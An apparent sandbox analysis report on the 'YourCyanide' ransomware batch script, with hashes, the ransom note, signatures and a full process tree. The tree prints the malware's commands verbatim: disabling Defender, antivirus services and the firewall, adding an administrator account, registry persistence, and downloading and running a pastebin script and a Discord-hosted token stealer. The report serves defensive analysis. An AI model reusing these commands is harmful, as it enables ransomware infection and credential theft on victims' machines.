Analysis
-
max time kernel
52s -
max time network
118s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
18-05-2022 00:35
General
-
Target
YourCyanide.cmd
-
Size
90KB
-
MD5
4cb725f17bec289507f9e8249c8ea80e
-
SHA1
a7034e84cb884bf90e61ce3b621424bec57334ae
-
SHA256
1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62
-
SHA512
776982eab99b1285c209b71e2fd39e2765e9ce392a6c310208e72157dab3895b0b5a7c8b63d72e69bc507c88faec90a2f8f57788873f1a617a2659e22d2b7288
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe
Extracted
Path
C:\Users\Admin\Desktop\YcynNote.txt
Ransom Note
Q: What happened to my files?
A: Oops your files have been encrypted by YourCyanide.
Q: how can I get them back?
A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf.
Q: What happens if I dont pay
A: You will never get your files back.
Q: How can I contact you
A: contact at yourcyanide.help@gmail.com
++++++++++++++++++++++++++++++++++++++++++++
18064 Files have been encrypted
Emails
yourcyanide.help@gmail.com
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 1 IoCs
-
Modifies registry class 21 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
NTFS ADS 4 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 57 IoCs
-
Suspicious use of AdjustPrivilegeToken 10 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd2⤵
- Views/modifies file attributes
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_4964_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd /f2⤵
- Adds Run key to start application
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\net.exenet stop "WinDefend"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "wuauserv"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"3⤵
-
C:\Windows\system32\net.exenet stop "security center"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"3⤵
-
C:\Windows\system32\net.exenet stop sharedaccess2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess3⤵
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable2⤵
-
C:\Windows\system32\net.exenet stop "Security Center" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center" /y3⤵
-
C:\Windows\system32\net.exenet stop "Automatic Updates" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Automatic Updates" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵
-
C:\Windows\system32\net.exenet stop "SAVScan" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVScan" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Firewall Monitor Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto-Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee Spamkiller Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee Personal Firewall Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee SecurityCenter Update Manager" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec SPBBCSvc" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "Ahnlab Task Scheduler" /y2⤵
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop vrmonsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vrmonsvc /y3⤵
-
C:\Windows\system32\net.exenet stop MonSvcNT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MonSvcNT /y3⤵
-
C:\Windows\system32\net.exenet stop SAVScan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVScan /y3⤵
-
C:\Windows\system32\net.exenet stop NProtectService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NProtectService /y3⤵
-
C:\Windows\system32\net.exenet stop ccSetMGR /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMGR /y3⤵
-
C:\Windows\system32\net.exenet stop ccEvtMGR /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMGR /y3⤵
-
C:\Windows\system32\net.exenet stop srservice /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Network Drivers Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton Unerase Protection" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton Unerase Protection" /y3⤵
-
C:\Windows\system32\net.exenet stop MskService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y3⤵
-
C:\Windows\system32\net.exenet stop MpfService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpfService /y3⤵
-
C:\Windows\system32\net.exenet stop mcupdmgr.exe /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mcupdmgr.exe /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeAntiSpyware" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y3⤵
-
C:\Windows\system32\net.exenet stop helpsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop helpsvc /y3⤵
-
C:\Windows\system32\net.exenet stop ERSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ERSvc /y3⤵
-
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*norton*" /y3⤵
-
C:\Windows\system32\net.exenet stop "*Symantec*" /y2⤵
-
C:\Windows\system32\net.exenet stop "*McAfee*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*McAfee*" /y3⤵
-
C:\Windows\system32\net.exenet stop ccPwdSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccPwdSvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Serv-U" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Serv-U" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "NAV Alert" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NAV Alert" /y3⤵
-
C:\Windows\system32\net.exenet stop "Nav Auto-Protect" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Nav Auto-Protect" /y3⤵
-
C:\Windows\system32\net.exenet stop "McShield" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield" /y3⤵
-
C:\Windows\system32\net.exenet stop "DefWatch" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "DefWatch" /y3⤵
-
C:\Windows\system32\net.exenet stop eventlog /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop eventlog /y3⤵
-
C:\Windows\system32\net.exenet stop InoRPC /y2⤵
-
C:\Windows\system32\net.exenet stop InoRT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRT /y3⤵
-
C:\Windows\system32\net.exenet stop InoTask /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoTask /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Corporate Edition" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y3⤵
-
C:\Windows\system32\net.exenet stop "ViRobot Professional Monitoring" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y3⤵
-
C:\Windows\system32\net.exenet stop "PC-cillin Personal Firewall" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y3⤵
-
C:\Windows\system32\net.exenet stop "Trend Micro Proxy Service" /y2⤵
-
C:\Windows\system32\net.exenet stop "Trend NT Realtime Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend NT Realtime Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee.com McShield" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com McShield" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee.com VirusScan Online Realtime Engine" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y3⤵
-
C:\Windows\system32\net.exenet stop "SyGateService" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SyGateService" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus Network" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Job Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Realtime Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus RPC Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y3⤵
-
C:\Windows\system32\net.exenet stop netsvcs2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netsvcs3⤵
-
C:\Windows\system32\net.exenet stop spoolnt2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop spoolnt3⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\tskill.exetskill iexplore2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill msnmsgr2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill excel2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill iTunes2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill calc2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill msaccess2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill safari2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill mspaint2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill outlook2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill WINWORD2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill msnmsgr2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill firefox2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill LimreWire2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://pastebin.com/raw/2K5m42Xp -outfile ycynlog.cmd"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K ycynlog.cmd2⤵
- NTFS ADS
-
C:\Windows\system32\attrib.exeattrib +h +s ycynlog.cmd3⤵
- Views/modifies file attributes
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_5072_toolbar" /t "REG_SZ" /d ycynlog.cmd /f3⤵
- Adds Run key to start application
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe')"3⤵
-
C:\Users\Admin\GetToken.exeGetToken.exe3⤵
-
C:\Windows\system32\curl.execurl -s -o IP.txt https://ipv4.wtfismyip.com/text3⤵
-
